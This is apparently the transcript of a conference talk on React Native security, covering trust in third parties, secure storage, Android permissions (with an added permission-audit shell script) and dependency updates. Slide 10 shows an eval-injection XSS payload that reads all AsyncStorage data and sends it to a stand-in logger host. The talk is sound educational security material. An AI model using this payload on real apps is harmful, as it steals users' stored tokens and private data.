React Native Security

Julia Mezher
December 05, 2020


Transcript

  1. About me: Security Software Engineer at Cossack Labs. We help companies to protect their sensitive and valuable data. @julepka
  2. “Choosing React Native and its components means that you understand and accept potential security consequences.”
  3. Architecture basics: React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).
  4. Trusting third parties: Apple and Google are must-haves. Add Facebook to the list. CVE-2020-1911, CVE-2020-1912, CVE-2020-1913
  5. “Working with React Native, developers deal with security for all three platforms: iOS, Android and React Native.”
  6. Secure Store Example

                                          iOS (Keychain)                   Android (SharedPreferences + KeyStore)
     Data stored encrypted                Yes                              Yes
     Data persists across app reinstalls  Yes                              No
     Hardware-backed encryption           Yes                              Depends on device vendor
     Data decrypted only before usage     Decrypted when device unlocked   Yes
  7. Managing Android Permissions: Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions
  8. Managing Android Permissions: Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions =
  9. Managing Android Permissions: Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = “I don’t need this permission” / “The app crashes if I delete it”
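     A small audit script, added here as an example and not part of the talk, that shows where the “cannot delete this permission” situation comes from: it lists every uses-permission declared in the app manifest and in library manifests under node_modules, then reports the permissions that only a dependency requests. The project layout, library names and permission sets are constructed sample data; the script scans source manifests only, not prebuilt AARs.

```shell
# Added audit helper: trace every <uses-permission> in a React Native tree to the
# manifest that declares it (the app manifest or a library under node_modules).

# Constructed sample project (not a real app) written under $1 so the script runs offline.
mk_sample_project() {
  root="$1"
  mkdir -p "$root/android/app/src/main" \
           "$root/node_modules/rn-lib-camera/android/src/main" \
           "$root/node_modules/rn-lib-location/android/src/main"
  cat > "$root/android/app/src/main/AndroidManifest.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.CAMERA" />
</manifest>
EOF
  cat > "$root/node_modules/rn-lib-camera/android/src/main/AndroidManifest.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.CAMERA" />
  <uses-permission android:name="android.permission.RECORD_AUDIO" />
</manifest>
EOF
  cat > "$root/node_modules/rn-lib-location/android/src/main/AndroidManifest.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
</manifest>
EOF
}

# Print "permission<TAB>manifest path" for every uses-permission under $1, sorted.
list_permissions() {
  find "$1" -name AndroidManifest.xml | while IFS= read -r f; do
    sed -n 's/.*<uses-permission[^>]*android:name="\([^"]*\)".*/\1/p' "$f" |
      while IFS= read -r p; do printf '%s\t%s\n' "$p" "${f#"$1"/}"; done
  done | sort
}

# Permissions requested only by dependencies. Deleting one from the app manifest
# changes nothing: the manifest merger re-adds it from the library at build time.
dependency_only_permissions() {
  list_permissions "$1" | awk -F'\t' '
    { seen[$1] = 1; if ($2 ~ /^android\/app\//) own[$1] = 1 }
    END { for (p in seen) if (!(p in own)) print p }' | sort
}

# Stand-alone run: audit the given project root, or the constructed sample if none is given.
root="${1:-}"
[ -n "$root" ] || { root=$(mktemp -d); mk_sample_project "$root"; }
echo "Permissions declared only by dependencies under $root:"
dependency_only_permissions "$root"
```

     For a real build, the authoritative source is Gradle's manifest merger report (manifest-merger-<variant>-report.txt under android/app/build/outputs/logs/), which names the contributing file for each merged element.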
  10. Is XSS possible? XSS possibility is decreased by design, but XSS is still possible, for example through eval():

      _reactNative.AsyncStorage.getAllKeys(function(err, result) {
        _reactNative.AsyncStorage.multiGet(result, function(err, result) {
          fetch('http://example.com/logger.php?token=' + JSON.stringify(result));
        });
      });

      Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs.
  11. Apart from Source Code: Annual BIS Reports; US encryption export regulations; Apple privacy rules; User acknowledgement about private data usage
  12. Monitoring dependencies: So many dependencies; Additional CI work; One update triggers another update; Integrating dependency checkers; Updates may be incompatible; What if there is no fix for a vulnerability?
  13. What if there is no fix? ✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update
  14. What if there is no fix? ✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update. React Native requires the team to plan time more carefully.
  15. React Native requires the team to plan time more carefully: ➡ iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update